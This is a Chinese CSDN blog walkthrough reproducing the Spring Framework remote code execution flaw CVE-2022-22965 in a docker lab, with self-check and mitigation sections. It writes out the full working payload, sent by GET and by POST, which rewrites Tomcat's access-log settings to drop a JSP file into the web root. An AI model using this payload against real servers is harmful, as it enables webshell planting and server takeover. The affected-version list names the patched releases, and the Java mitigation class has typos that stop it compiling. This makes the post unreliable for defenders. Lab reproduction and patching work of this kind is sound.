Spring框架远程命令执行复现(CVE-2022-22965)

最新推荐文章于 2024-05-31 10:46:10 发布
最新推荐文章于 2024-05-31 10:46:10 发布
阅读量8.6k 收藏 3
点赞数 1
分类专栏: 网络安全 文章标签: java 网络安全 docker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_17754023/article/details/123899014
版权

2022年3月30日,Spring框架曝出RCE 0day漏洞,国家信息安全漏洞共享平台(CNVD)已收录了Spring框架远程命令执行漏洞(CNVD-2022-23942),考虑到Spring框架的广泛应用,漏洞被评级为危险。

通过该漏洞可写入webshell以及命令执行。在Spring框架的JDK9版本(及以上版本)中,远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值,从而触发pipeline机制并写入任意路径下的文件。

0x01 漏洞利用条件

1. Apache Tomcat作为Servlet容器;

2. 使用JDK9及以上版本的Spring MVC框架;

3. Spring框架以及衍生的框架spring-beans-*.jar文件或者存在

CachedIntrospectionResults.class

0x02 漏洞影响范围

1、JDK

    • JDK 9+

2、Spring Framework

    • 5.3.18+

    • 5.2.20+

0x03 漏洞复现

复现环境:Centos7(192.192.1.100)

docker pull vulfocus/spring-core-rce-2022-03-29:latest

运行docker拉取的镜像


docker run -itd -p 8090:8080 vulfocus/spring-core-rce-2022-03-29

 访问192.192.1.100+上面设置的8090端口

 利⽤class对象构造利⽤链,对Tomcat的日志配置进行修改,然后,向⽇志中写⼊shell

完整的利用链:

class.module.classLoader.resources.context.parent.pipeline.first.pattern=
构建文件的内容

class.module.classLoader.resources.context.parent.pipeline.first.suffix=
修改tomcat日志文件后缀

class.module.classLoader.resources.context.parent.pipeline.first.directory=
写入文件所在的网站根目录

class.module.classLoader.resources.context.parent.pipeline.first.prefix=
写入文件名称

class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
文件日期格式(实际构造为空值即可)

构造payload

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{test}i
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
class.module.classLoader.resources.context.parent.pipeline.first.directory=/app/tomcat/webapps/ROOT/
class.module.classLoader.resources.context.parent.pipeline.first.prefix=testfile
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

发送payload:

GET发送(需要分五次请求,依次发送有时候spring会出问题)

http://127.0.0.1:8090/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Btest%7Di
http://127.0.0.1:8090/?class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
http://127.0.0.1:8090/?class.module.classLoader.resources.context.parent.pipeline.first.directory=%2Fapp%2Ftomcat%2Fwebapps%2FROOT%2F
http://127.0.0.1:8090/?class.module.classLoader.resources.context.parent.pipeline.first.prefix=testfile
http://127.0.0.1:8090/?class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

POST发送(数据包格式 Content-Type: application/x-www-form-urlencoded,推荐这种方式)

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Btest%7Di&
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&
class.module.classLoader.resources.context.parent.pipeline.first.directory=%2Fapp%2Ftomcat%2Fwebapps%2FROOT%2F&
class.module.classLoader.resources.context.parent.pipeline.first.prefix=testfile&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

 

浏览器访问

192.192.1.100:8090/testfile.jsp

 

0x05 漏洞自查

可按照以下步骤来判断是否受此漏洞影响:

1.  排查是否使用了Spring框架(包括但不限于以下方法)

(1) 排查项目中是否使用了Spring框架:

可遍历项目文件查找是否包含spring-beans-*.jar

(2) 排查war包中是否存在Spring框架:

检查war包内是否存在spring-beans-*.jar文件,若存在则表示使用spring开发框架;若不存在,则进一步确认是否存在CachedIntrospectionResults.class文件,若存在则表示使用Spring开发框架或衍生框架。

(3) 排查jar包部中的Spring:

检查Jar包内是否存在spring-beans-*.jar文件,若存在则表示使用Spring开发框架;若不存在,则进一步确认是否存在CachedIntrospectionResults.class文件,若存在则表示使用Spring开发框架或衍生框架。

2. 排查包含Spring框架的项目使用的JDK版本,如果JDK版本>=9则存在风险。

0x06 漏洞修复

(一) WAF防护

在WAF等网络防护设备上,根据实际部署业务的流量情况,实现对class.*, Class.*,*.class.*,*.Class.* 等字符串的规则过滤,并在部署过滤规则后,对业务运行情况进行测试,避免产生额外影响。

(二) 临时修复措施

需同时按以下两个步骤进行漏洞的临时修复:

1.在应用中全局搜索@InitBinder注解,看看方法体内是否调用dataBinder.setDisallowedFields方法,如果发现此代码片段的引入,则在原来的黑名单中,添加{"class.*","Class.*","*.class.*","*.Class.*"}。(注:如果此代码片段使用较多,需要每个地方都追加)

2. 在用系统的项目包下新建以下全局类,并保证这个类被Spring 加载到(推荐在Controller所在的包中添加)。完成类添加后,需对项目进行重新编译打包和功能验证测试,并重新发布项目。

import org.springframework.core.annotation.Order;
import org.springframework.web.bind.WebDataBinder;
import org.springframework.web.bind.annotation.ControllerAdvice;
import org.springframework.web.bind.annotation.InitBinder;
@ControllerAdvice
@Order(10000)
public class GlobalControllerAdvicc{
@InitBinder
public void setAllowedFields(webdataBinder dataBinder){
String[]abd=new string[]{"class.*","Class.*","*.class.*","*.Class.*"};            dataBinder.setDisallowedFields(abd);
}
}

(三) 退钱!!!!

 本文只用来测试环境是否存在漏洞,请勿用于违法用途

一个梦字
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version<3.0.3 3.1.1<Apache spark 版本<3.1.2 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: https://spark.apache.org/downloads.html 2.安全设备路径添加黑名单或者增加WAF规则(临时方案)。
CVE-2022-22965 GUItools单个图形化利用工具
04-06
3月31日,spring 官方通报了 Spring 相关框架存在远程代码执行漏洞,并在 5.3.18 和 5.2.20.RELEASE 中修复了该漏洞。 漏洞评级:严重 影响组件:org.springframework:spring-beans 影响版本:< 5.3.18 和 < 5.2.20.RELEASE 的Spring框架均存在该漏洞,建议用户尽快进行排查处置。 缺陷分析 CVE-2010-1622中曾出现由于参数自动绑定机制导致的问题, 此前通过黑名单的方式修复了该漏洞,但是 JDK9之后引入了 Module,使得可以通过 getModule 绕过前者的黑名单限制,最后导致远程代码执行
SpringBoot项目中 Spring Framework远程代码执行漏洞的处理方案
傲泣龙腾的博客
04-08 1034
公司最近要求对所有项目进行漏洞检测修复,其中有一项漏洞名称为Spring Framework远程代码执行漏洞(CVE-2022-22965)需要升级Spring Framework版本解决,如图高危修复建议将Spring Framework升级至安全版本 ,即升级5.2.20及以上版本 或 5.3.18及以上版本,具体官方修复的5.2和5.3版本可以查找。
Spring远程命令执行漏洞
Where_dWanaGo的博客
04-01 173
Spring远程命令执行漏洞 title: spring漏洞记录 subtitle: spring漏洞记录 url:https://radarsoftware.cn/ tags: spring categories: spring Spring漏洞 转载地址:https://mp.weixin.qq.com/s/BnF8CWuUxNliCoa260bEaA Spring RCE (远程代码执行漏洞)已被官方证实。 国家信息安全漏洞平台:https://mp.weixin.qq.com/s/BnF8
Spring 远程命令执行漏洞分析(CVE-2022-22965
weixin_43263451的博客
08-14 3766
最近想学习学习spring框架方面的漏洞。刚好今年上半年爆了一个spring框架远程命令执行漏洞,随即赶紧来分析一波这个漏洞总的来说是因为:通过spring参数绑定处存在的缺陷使得可以修改tomcat的日志记录相关类AccessLogValve的成员变量从而达到修改tomcat日志记录的配置,最终导致写入jsp马class.module.classLoader.resources.context.parent.pipeline.first.pattern=此处为webshell内容............
Spring远程命令执行漏洞的简单概要
m0_50579386的博客
04-10 324
2022 年 3 月 31日,国家信息安全漏洞共享平台(CNVD)收录了 Spring 框架远程命令执行漏洞,并发布了关于 Spring 框架存在远程命令执行漏洞的安全公告,安全公告编号:CNTA-2022-0009,POC、EXP等漏洞利用细节已经公开,建议受影响的用户自查安全工作。
紧急通告 | Spring框架存在远程命令执行漏洞,悬镜全线产品已实现检测和防御覆盖
Anprou的博客
04-02 4479
近期,Spring官方披露了Spring框架远程命令执行漏洞(CVE-2022-22965),当JDK版本在9及以上版本时,易受此漏洞攻击影响。POC、EXP已公开,建议用户尽快进行自查工作。悬镜安全全线产品已于第一时间实现对该漏洞的检测和防御覆盖。 一、漏洞描述 SpringJava生态使用最广泛的开发框架。未经身份验证的攻击者可以使用此漏洞远程执行命令。JDK 9.0 及以上版本易受到影响。 二、影响版本 版本低于5.3.18和5.2.20的Spring框架或其衍生框架。 ..
Springboot远程代码执行spring cloud SnakeYAML RCE)
qq_50854662的博客
06-27 739
Spring-boot远程代码执行系列(spring cloud SnakeYAML RCE)
spring远程命令执行漏洞,JDK版本9及以上
Object的博客
03-30 276
【漏洞预警】Spring远程命令执行漏洞
【干货】Spring远程命令执行漏洞(CVE-2022-22965)原理分析和思考
小司机的奥拓
07-22 704
上周网上爆出Spring框架存在RCE漏洞,野外流传了一小段时间后,Spring官方在3月31日正式发布了漏洞信息,漏洞编号为CVE-2022-22965。本文章对该漏洞进行了复现和分析,希望能够帮助到有相关有需要的人员进一步研究。##
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
10-27
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
Spring Framework RCE 漏洞分析 (CVE-2022-22965)
m0_61506558的博客
11-07 1657
该漏洞的本质类似于php的变量覆盖漏洞,exp利用的话,恰好覆盖到tomcat的配置,并修改tomcat的日志位置到根目录,修改日志的后缀为jsp。但是这里叫SpringMVC的参数绑定。 由于笔者个人水平有限,行文如有不当,还请各位师傅评论指正,非常感谢!
【STM32学习】HAL库点灯学习
2301_78895982的博客
05-26 892
STM32基于HAL库流水灯实验_hel库安装教程中文版-CSDN博客t=N7T8。
operator <=> (spaceship operator)
janeqi1987的专栏
05-28 900
= 与!= 操作符为了检查是否相等,现在定义== 操作符就够了。当编译器找不到表达式的匹配声明a!=b 时,编译器会重写表达式并查找!(a==b)。若这不起作用,编译器也会尝试改变操作数的顺序,所以也会尝试!(b==a):a!=b,!(b==a)因此,对于TypeA 的a 和TypeB 的b,编译器将能够识别并编译a!= b若需要的话,可以这样做• 一个独立函数operator!• 一个独立函数operator==(TypeA, TypeB)
Spring6基础笔记
质胜文则野,文胜质则史。文质彬彬,然后君子。
05-21 1209
Spring 是一款主流的 Java EE 轻量级开源框架Spring 由“Spring 之父”Rod Johnson 提出并创立,其目的是用于简化 Java 企业级应用的开发难度和开发周期。Spring的用途不仅限于服务器端的开发。从简单性、可测试性和松耦合的角度而言,任何Java应用都可以从Spring中受益。Spring 框架除了自己提供功能外,还提供整合其他技术和框架的能力。Spring 自诞生以来备受青睐,一直被广大开发人员作为 Java 企业级应用程序开发的首选。时至今日,Spring 俨然
Java 异常处理中try-catch块、finally子句以及自定义异常的使用
最新发布
Itmastergo的博客
05-31 671
异常是程序运行过程中出现的非正常情况。Java 使用异常类(Exception 类及其子类)来表示这些异常情况。异常处理的核心思想是将正常的程序流程与异常处理流程分离开来,使代码更加清晰和可维护。Throwable 类:所有异常和错误的基类。Error 类:表示系统级的错误,程序通常无法处理,比如内存不足(OutOfMemoryError)。Exception 类:表示程序中可以处理的异常情况。RuntimeException 类。
Java手动启动jar包
liangweihao的博客
05-29 226
【代码】Java手动启动jar包。
vulhub复现CVE-2022-22947
10-13
复现CVE-2022-22947漏洞,需要先在vulhub上搭建一个运行着vBulletin 5.6.4版本的环境。然后,通过发送特制的HTTP请求,即可触发漏洞,导致远程代码执行。 具体步骤如下: 1. 在vulhub上下载并启动vBulletin 5.6.4环境。 2. 使用工具生成特制的HTTP请求,其中包含恶意代码。 3. 将HTTP请求发送给vBulletin服务器,即可触发漏洞。 4. 漏洞触发后,攻击者可以在服务器上执行任意代码,获取敏感信息等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值